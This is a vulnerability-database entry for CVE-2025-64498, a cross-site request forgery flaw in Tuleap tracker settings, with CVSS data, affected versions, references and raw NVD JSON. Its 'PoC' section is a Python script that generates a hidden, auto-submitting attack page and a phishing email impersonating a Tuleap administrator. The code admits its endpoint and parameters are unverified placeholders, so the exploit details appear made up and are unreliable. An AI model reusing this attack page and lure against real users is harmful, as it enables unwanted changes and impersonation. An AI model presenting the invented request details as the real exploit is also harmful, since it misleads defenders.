Security Vulnerability Report
CVE-2025-64498 CVSS 4.6 MEDIUM

CVE-2025-64498

Published: 2025-12-08 23:15:48
Last Modified: 2025-12-10 21:04:57

Description

Tuleap is an Open Source Suite for management of software development and collaboration. Tuleap Community Edition versions below 17.0.99.1762444754 and Tuleap Enterprise Edition versions prior to 17.0-2, 16.13-7 and 16.12-10 allow attackers to trick victims into changing tracker general settings (a cross-site request forgery, CWE-352). This issue is fixed in Tuleap Community Edition version 17.0.99.1762444754 and Tuleap Enterprise Edition versions 17.0-2, 16.13-7 and 16.12-10.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:enalean:tuleap:*:*:*:*:community:*:*:* - Tuleap Community Edition < 17.0.99.1762444754 - VULNERABLE
cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:* - Tuleap Enterprise Edition < 16.12-10 - VULNERABLE
cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:* - Tuleap Enterprise Edition >= 16.13 and < 16.13-7 - VULNERABLE
cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:* - Tuleap Enterprise Edition >= 17.0 and < 17.0-2 - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-64498 PoC - CSRF Attack for Tuleap Tracker Settings Modification
# This PoC demonstrates how an attacker can trick a victim into changing tracker settings
import html


def generate_csrf_poc(target_url, tracker_id):
    """
    Generate CSRF PoC HTML for Tuleap tracker settings modification

    Args:
        target_url: Base URL of the vulnerable Tuleap instance
        tracker_id: ID of the target tracker to modify

    Returns:
        Malicious HTML page that will auto-submit the CSRF attack
    """
    # Tuleap tracker settings update endpoint
    # (the endpoint and parameter names below are the PoC's own illustrative
    # placeholders; they are not verified against the Tuleap code base)
    settings_endpoint = f"{target_url}/tracker/?aid={tracker_id}"

    # Example malicious configuration parameters
    # In real attack, these would be crafted based on specific vulnerability details
    malicious_payload = {
        "func": "admin-update",
        "workflow_mode": "restricted",
        "enable_notifications": "0",
        "csrf_token": "attacker-controlled-or-stolen",
    }

    # Generate HTML form with auto-submit; values are HTML-escaped so the
    # generated markup stays well-formed
    form_fields = ""
    for key, value in malicious_payload.items():
        escaped_value = html.escape(str(value))
        form_fields += f'        <input type="hidden" name="{key}" value="{escaped_value}">\n'

    poc_html = f'''<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
    <style>
        body {{ display: none; background-color: #f0f0f0; }}
        .loader {{
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            border: 5px solid #f3f3f3;
            border-top: 5px solid #3498db;
            border-radius: 50%;
            width: 50px;
            height: 50px;
            animation: spin 2s linear infinite;
        }}
        @keyframes spin {{
            0% {{ transform: rotate(0deg); }}
            100% {{ transform: rotate(360deg); }}
        }}
    </style>
</head>
<body>
    <div class="loader"></div>
    <form id="csrf_form" action="{settings_endpoint}" method="POST">
{form_fields}    </form>
    <script>
        // Auto-submit the form when page loads
        window.onload = function() {{
            document.getElementById('csrf_form').submit();
        }};
    </script>
</body>
</html>
'''
    return poc_html


def generate_phishing_email():
    """
    Generate phishing email content to deliver the CSRF attack
    """
    email_template = '''
Subject: Important: Update Your Project Tracker Configuration

Dear Tuleap User,

We have detected some configuration issues with your project tracker.
Please click the link below to verify and update your settings:

[Malicious Link Here]

If you did not request this, please ignore this email.

Best regards,
Tuleap System Administrator
'''
    return email_template


if __name__ == "__main__":
    # Example usage
    target = "https://vulnerable-tuleap.example.com"
    tracker = "45593"
    poc = generate_csrf_poc(target, tracker)
    with open("csrf_exploit.html", "w", encoding="utf-8") as f:
        f.write(poc)
    print("CSRF PoC generated: csrf_exploit.html")
    print("\n[!] Disclaimer: This PoC is for educational and authorized testing purposes only.")
```

References

https://github.com/Enalean/tuleap/commit/993316dd6a291bb3937cb7a4571eaab0e7d55370 - Patch
https://github.com/Enalean/tuleap/security/advisories/GHSA-vxfh-h8p6-p5rg - Vendor Advisory
https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=993316dd6a291bb3937cb7a4571eaab0e7d55370 - Patch, Broken Link
https://tuleap.net/plugins/tracker/?aid=45593 - Issue Tracking, Vendor Advisory

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-64498", "sourceIdentifier": "[email protected]", "published": "2025-12-08T23:15:48.153", "lastModified": "2025-12-10T21:04:56.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tuleap is an Open Source Suite for management of software development and collaboration. Tuleap Community Edition versions below 17.0.99.1762444754 and Tuleap Enterprise Edition versions prior to 17.0-2, 16.13-7 and 16.12-10 allow attackers trick victims into changing tracker general settings. This issue is fixed in version Tuleap Community Edition version 17.0.99.1762444754 and Tuleap Enterprise Edition versions 17.0-2, 16.13-7 and 16.12-10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionEndExcluding": "16.12-10", "matchCriteriaId": "286870BF-3315-4B78-AC67-97EB2D5F34ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:community:*:*:*", "versionEndExcluding": "17.0.99.1762444754", "matchCriteriaId": "CEF7B557-D311-40F3-9E94-DCEBD375B9F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "16.13", "versionEndExcluding": "16.13-7", "matchCriteriaId": "CBD9092A-8E4A-43EF-B9B8-D8BDA9D30430"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.0", "versionEndExcluding": "17.0-2", "matchCriteriaId": "F96A9306-179A-48BD-A2D9-CB081E9747B8"}]}]}], "references": [{"url": "https://github.com/Enalean/tuleap/commit/993316dd6a291bb3937cb7a4571eaab0e7d55370", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Enalean/tuleap/security/advisories/GHSA-vxfh-h8p6-p5rg", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=993316dd6a291bb3937cb7a4571eaab0e7d55370", "source": "[email protected]", "tags": ["Patch", "Broken Link"]}, {"url": "https://tuleap.net/plugins/tracker/?aid=45593", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
```